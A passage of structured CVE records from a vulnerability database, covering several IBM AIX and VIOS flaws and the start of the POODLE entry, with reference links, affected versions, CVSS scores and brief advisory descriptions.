"http://www.securityfocus.com/archive/1/532689/100/0/threaded" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-3074/" }, { "name": "IV60940", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV60940" }, { "name": "20140708 CVE-2014-3074 - Runtime Linker Allows Privilege Escalation Via Arbitrary File Writes in IBM AIX", "tags": [ "mailing-list", "x_refsource_FULLDISC" ], "url": "http://seclists.org/fulldisclosure/2014/Jul/31" }, { "name": "1030504", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1030504" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://aix.software.ibm.com/aix/efixes/security/malloc_advisory.asc" }, { "name": "IV61311", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV61311" }, { "name": "ibm-aix-cve20143074-priv-escalation(93816)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/93816" }, { "tags": [ "x_refsource_MISC" ], "url": "http://packetstormsecurity.com/files/127390/IBM-AIX-Runtime-Linker-Privilege-Escalation.html" }, { "name": "IV60935", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV60935" }, { "name": "IV61315", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV61315" }, { "name": "59344", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/59344" }, { "name": "IV61313", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV61313" }, { "name": "IV61314", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV61314" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "ID": "CVE-2014-3074", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "The runtime linker in IBM AIX 6.1 and 7.1 and VIOS 2.2.x allows local users to create a mode-666 root-owned file, and consequently gain privileges, by setting crafted MALLOCOPTIONS and MALLOCBUCKETS environment-variable values and then executing a setuid program." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "68296", "refsource": "BID", "url": "http://www.securityfocus.com/bid/68296" }, { "name": "20140708 CVE-2014-3074 - Runtime Linker Allows Privilege Escalation Via Arbitrary File Writes in IBM AIX", "refsource": "BUGTRAQ", "url": "http://www.securityfocus.com/archive/1/532689/100/0/threaded" }, { "name": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-3074/", "refsource": "MISC", "url": "https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-3074/" }, { "name": "IV60940", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV60940" }, { "name": "20140708 CVE-2014-3074 - Runtime Linker Allows Privilege Escalation Via Arbitrary File Writes in IBM AIX", "refsource": "FULLDISC", "url": "http://seclists.org/fulldisclosure/2014/Jul/31" }, { "name": "1030504", "refsource": "SECTRACK", "url": "http://www.securitytracker.com/id/1030504" }, { "name": "http://aix.software.ibm.com/aix/efixes/security/malloc_advisory.asc", "refsource": "CONFIRM", "url": "http://aix.software.ibm.com/aix/efixes/security/malloc_advisory.asc" }, { "name": "IV61311", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV61311" }, { "name": "ibm-aix-cve20143074-priv-escalation(93816)", "refsource": "XF", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/93816" }, { "name": "http://packetstormsecurity.com/files/127390/IBM-AIX-Runtime-Linker-Privilege-Escalation.html", "refsource": "MISC", "url": "http://packetstormsecurity.com/files/127390/IBM-AIX-Runtime-Linker-Privilege-Escalation.html" }, { "name": "IV60935", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV60935" }, { "name": "IV61315", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV61315" }, { "name": "59344", "refsource": "SECUNIA", "url": "http://secunia.com/advisories/59344" }, { "name": "IV61313", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV61313" }, { "name": "IV61314", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV61314" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2014-3074", "datePublished": "2014-07-02T10:00:00", "dateReserved": "2014-04-29T00:00:00", "dateUpdated": "2024-08-06T10:35:55.724Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-22444
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6594859 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/224444 | vdb-entry, x_refsource_XF |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T03:14:54.990Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6594859" }, { "name": "ibm-aix-cve202222444-dos (224444)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/224444" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.1" }, { "status": "affected", "version": "7.2" }, { "status": "affected", "version": "7.3" } ] }, { "product": "VIOS", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.1" } ] } ], "datePublic": "2022-06-14T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a local user to exploit a vulnerability in the lpd daemon to cause a denial of service. IBM X-Force ID: 224444." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "NONE", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 5.4, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/UI:N/I:N/AV:L/A:H/C:N/S:U/AC:L/PR:N/E:U/RC:C/RL:O", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Denial of Service", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-06-15T15:40:14", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6594859" }, { "name": "ibm-aix-cve202222444-dos (224444)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/224444" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2022-06-14T00:00:00", "ID": "CVE-2022-22444", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "AIX", "version": { "version_data": [ { "version_value": "7.1" }, { "version_value": "7.2" }, { "version_value": "7.3" } ] } }, { "product_name": "VIOS", "version": { "version_data": [ { "version_value": "3.1" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM AIX 7.1, 7.2, 7.3, and VIOS 3.1 could allow a local user to exploit a vulnerability in the lpd daemon to cause a denial of service. IBM X-Force ID: 224444." } ] }, "impact": { "cvssv3": { "BM": { "A": "H", "AC": "L", "AV": "L", "C": "N", "I": "N", "PR": "N", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Denial of Service" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6594859", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6594859 (AIX)", "url": "https://www.ibm.com/support/pages/node/6594859" }, { "name": "ibm-aix-cve202222444-dos (224444)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/224444" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2022-22444", "datePublished": "2022-06-15T15:40:14.630739Z", "dateReserved": "2022-01-03T00:00:00", "dateUpdated": "2024-09-16T22:30:04.252Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2011-1385
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.ibm.com/support/docview.wss?uid=isg1IV13554 | vendor-advisory, x_refsource_AIXAPAR | |
http://osvdb.org/79631 | vdb-entry, x_refsource_OSVDB | |
http://www.ibm.com/support/docview.wss?uid=isg1IV08255 | vendor-advisory, x_refsource_AIXAPAR | |
http://aix.software.ibm.com/aix/efixes/security/icmp_advisory.asc | x_refsource_CONFIRM | |
http://www.ibm.com/support/docview.wss?uid=isg1IV07188 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.ibm.com/support/docview.wss?uid=isg1IV04695 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.securityfocus.com/bid/52172 | vdb-entry, x_refsource_BID | |
http://www.ibm.com/support/docview.wss?uid=isg1IV13672 | vendor-advisory, x_refsource_AIXAPAR | |
http://secunia.com/advisories/48149 | third-party-advisory, x_refsource_SECUNIA | |
http://www.ibm.com/support/docview.wss?uid=isg1IV03369 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.securitytracker.com/id?1026742 | vdb-entry, x_refsource_SECTRACK |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T22:21:34.272Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "IV13554", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV13554" }, { "name": "79631", "tags": [ "vdb-entry", "x_refsource_OSVDB", "x_transferred" ], "url": "http://osvdb.org/79631" }, { "name": "IV08255", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV08255" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://aix.software.ibm.com/aix/efixes/security/icmp_advisory.asc" }, { "name": "IV07188", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV07188" }, { "name": "IV04695", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV04695" }, { "name": "52172", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/52172" }, { "name": "IV13672", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV13672" }, { "name": "48149", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/48149" }, { "name": "IV03369", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV03369" }, { "name": "1026742", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id?1026742" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2012-02-24T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM AIX 5.3, 6.1, and 7.1, and VIOS 2.1.x and 2.2.x, allows remote attackers to cause a denial of service (system crash) via an ICMP Echo Reply packet that contains 1 in the Identifier field, a different vulnerability than CVE-2012-0194." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2018-01-09T17:57:01", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "name": "IV13554", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV13554" }, { "name": "79631", "tags": [ "vdb-entry", "x_refsource_OSVDB" ], "url": "http://osvdb.org/79631" }, { "name": "IV08255", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV08255" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://aix.software.ibm.com/aix/efixes/security/icmp_advisory.asc" }, { "name": "IV07188", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV07188" }, { "name": "IV04695", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV04695" }, { "name": "52172", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/52172" }, { "name": "IV13672", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV13672" }, { "name": "48149", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/48149" }, { "name": "IV03369", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV03369" }, { "name": "1026742", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id?1026742" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2011-1385", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM AIX 5.3, 6.1, and 7.1, and VIOS 2.1.x and 2.2.x, allows remote attackers to cause a denial of service (system crash) via an ICMP Echo Reply packet that contains 1 in the Identifier field, a different vulnerability than CVE-2012-0194." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "IV13554", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV13554" }, { "name": "79631", "refsource": "OSVDB", "url": "http://osvdb.org/79631" }, { "name": "IV08255", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV08255" }, { "name": "http://aix.software.ibm.com/aix/efixes/security/icmp_advisory.asc", "refsource": "CONFIRM", "url": "http://aix.software.ibm.com/aix/efixes/security/icmp_advisory.asc" }, { "name": "IV07188", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV07188" }, { "name": "IV04695", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV04695" }, { "name": "52172", "refsource": "BID", "url": "http://www.securityfocus.com/bid/52172" }, { "name": "IV13672", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV13672" }, { "name": "48149", "refsource": "SECUNIA", "url": "http://secunia.com/advisories/48149" }, { "name": "IV03369", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV03369" }, { "name": "1026742", "refsource": "SECTRACK", "url": "http://www.securitytracker.com/id?1026742" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2011-1385", "datePublished": "2012-03-02T22:00:00", "dateReserved": "2011-03-10T00:00:00", "dateUpdated": "2024-08-06T22:21:34.272Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-45171
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/7105282 | vendor-advisory | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/267969 | vdb-entry |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T20:14:19.817Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/7105282" }, { "tags": [ "vdb-entry", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/267969" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "AIX", "vendor": "IBM", "versions": [ { "status": "affected", "version": "7.2, 7.3, VIOS 3.1" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the kernel to cause a denial of service. IBM X-Force ID: 267969." } ], "value": "IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the kernel to cause a denial of service. IBM X-Force ID: 267969." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-20", "description": "CWE-20 Improper Input Validation", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-01-11T02:07:18.677Z", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://www.ibm.com/support/pages/node/7105282" }, { "tags": [ "vdb-entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/267969" } ], "source": { "discovery": "UNKNOWN" }, "title": "IBM AIX denial of service", "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2023-45171", "datePublished": "2024-01-11T02:07:18.677Z", "dateReserved": "2023-10-05T01:38:44.722Z", "dateUpdated": "2024-08-02T20:14:19.817Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2012-4833
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://exchange.xforce.ibmcloud.com/vulnerabilities/78907 | vdb-entry, x_refsource_XF | |
http://www.ibm.com/support/docview.wss?uid=isg1IV28756 | vendor-advisory, x_refsource_AIXAPAR | |
http://www.ibm.com/support/docview.wss?uid=isg1IV28754 | vendor-advisory, x_refsource_AIXAPAR | |
http://aix.software.ibm.com/aix/efixes/security/fuser_advisory.asc | x_refsource_CONFIRM | |
http://www.ibm.com/support/docview.wss?uid=isg1IV28151 | vendor-advisory, x_refsource_AIXAPAR | |
http://secunia.com/advisories/50708 | third-party-advisory, x_refsource_SECUNIA | |
http://www.securityfocus.com/bid/55726 | vdb-entry, x_refsource_BID | |
http://www.securitytracker.com/id?1027586 | vdb-entry, x_refsource_SECTRACK | |
http://www.ibm.com/support/docview.wss?uid=isg1IV28749 | vendor-advisory, x_refsource_AIXAPAR |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T20:50:17.513Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "aix-fuser-kill-process(78907)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/78907" }, { "name": "IV28756", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV28756" }, { "name": "IV28754", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV28754" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://aix.software.ibm.com/aix/efixes/security/fuser_advisory.asc" }, { "name": "IV28151", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV28151" }, { "name": "50708", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": "http://secunia.com/advisories/50708" }, { "name": "55726", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/55726" }, { "name": "1027586", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id?1027586" }, { "name": "IV28749", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV28749" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2012-09-28T00:00:00", "descriptions": [ { "lang": "en", "value": "fuser in IBM AIX 6.1 and 7.1, and VIOS 2.2.1.4-FP-25 SP-02, does not properly restrict the -k option, which allows local users to kill arbitrary processes via a crafted command line." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-08-28T12:57:01", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "name": "aix-fuser-kill-process(78907)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/78907" }, { "name": "IV28756", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV28756" }, { "name": "IV28754", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV28754" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://aix.software.ibm.com/aix/efixes/security/fuser_advisory.asc" }, { "name": "IV28151", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV28151" }, { "name": "50708", "tags": [ "third-party-advisory", "x_refsource_SECUNIA" ], "url": "http://secunia.com/advisories/50708" }, { "name": "55726", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/55726" }, { "name": "1027586", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id?1027586" }, { "name": "IV28749", "tags": [ "vendor-advisory", "x_refsource_AIXAPAR" ], "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV28749" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "ID": "CVE-2012-4833", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "fuser in IBM AIX 6.1 and 7.1, and VIOS 2.2.1.4-FP-25 SP-02, does not properly restrict the -k option, which allows local users to kill arbitrary processes via a crafted command line." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "aix-fuser-kill-process(78907)", "refsource": "XF", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/78907" }, { "name": "IV28756", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV28756" }, { "name": "IV28754", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV28754" }, { "name": "http://aix.software.ibm.com/aix/efixes/security/fuser_advisory.asc", "refsource": "CONFIRM", "url": "http://aix.software.ibm.com/aix/efixes/security/fuser_advisory.asc" }, { "name": "IV28151", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV28151" }, { "name": "50708", "refsource": "SECUNIA", "url": "http://secunia.com/advisories/50708" }, { "name": "55726", "refsource": "BID", "url": "http://www.securityfocus.com/bid/55726" }, { "name": "1027586", "refsource": "SECTRACK", "url": "http://www.securitytracker.com/id?1027586" }, { "name": "IV28749", "refsource": "AIXAPAR", "url": "http://www.ibm.com/support/docview.wss?uid=isg1IV28749" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2012-4833", "datePublished": "2012-10-01T18:00:00", "dateReserved": "2012-09-06T00:00:00", "dateUpdated": "2024-08-06T20:50:17.513Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2014-3566
Vulnerability from cvelistv5
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T10:50:17.863Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "HPSBOV03227", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142103967620673\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory11.asc" }, { "name": "1031090", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1031090" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://blog.nodejs.org/2014/10/23/node-v0-10-33-stable/" }, { "name": "RHSA-2014:1880", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "http://rhn.redhat.com/errata/RHSA-2014-1880.html" }, { "name": "HPSBHF03300", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142804214608580\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04819635" }, { "name": "VU#577193", "tags": [ "third-party-advisory", "x_refsource_CERT-VN", "x_transferred" ], "url": "http://www.kb.cert.org/vuls/id/577193" }, { "name": "HPSBMU03184", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=141577087123040\u0026w=2" }, { "name": "HPSBGN03209", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=141715130023061\u0026w=2" }, { "name": "openSUSE-SU-2014:1331", "tags": [ "vendor-advisory", "x_refsource_SUSE", "x_transferred" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2014-10/msg00008.html" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://support.apple.com/kb/HT6542" }, { "name": "1031106", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1031106" }, { "name": "HPSBGN03201", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=141697638231025\u0026w=2" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html" }, { "name": "[openssl-dev] 20141014 Patch to mitigate CVE-2014-3566 (\"POODLE\")", "tags": [ "mailing-list", "x_refsource_MLIST", "x_transferred" ], "url": "http://marc.info/?l=openssl-dev\u0026m=141333049205629\u0026w=2" }, { "name": "SSRT101898", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142350298616097\u0026w=2" }, { "name": "SSRT101896", "tags": [ "vendor-advisory", "x_refsource_HP", "x_transferred" ], "url": "http://marc.info/?l=bugtraq\u0026m=142350743917559\u0026w=2" }, { "name": "60056", "tags": [ "third-party-advisory", "x_refsource_SECUNIA", "x_transferred" ], "url": 